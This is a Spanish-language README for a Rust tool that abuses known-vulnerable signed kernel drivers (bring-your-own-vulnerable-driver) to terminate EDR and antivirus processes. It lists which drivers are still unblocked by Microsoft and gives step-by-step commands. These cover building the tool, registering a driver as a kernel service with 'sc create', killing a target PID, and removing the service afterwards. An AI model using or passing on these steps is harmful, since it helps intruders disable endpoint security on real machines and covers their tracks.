
BYOVD collection
Este proyecto es una colección BYOVD centrada en eliminar procesos de EDR / AV.
Actualmente se admiten los siguientes controladores:
| Driver | Argument Name | Blocked |
|---|---|---|
| Process Explorer | process_explorer | Yes |
| Genshin Impact | genshin | Yes |
| Rentdrv2 | rentdrv2 | No |
| TrueSight | truesight | No |
"Blocked" significa que el controlador está en la lista de bloqueo de Microsoft y no puede ejecutarse en un Windows actualizado.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
Dado que el ejecutable no registra un servicio para explotar el controlador, esto debe hacerse manualmente:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
Después, el servicio puede iniciarse:
sc start Test123
Finalmente, para finalizar el proceso con el PID 1234 usando el controlador de Process Explorer, se puede usar el siguiente comando:
rusty_drivers.exe --pid 1234 --driver process_explorer
No olvides limpiar el servicio después:
sc stop Test123
sc delete Test123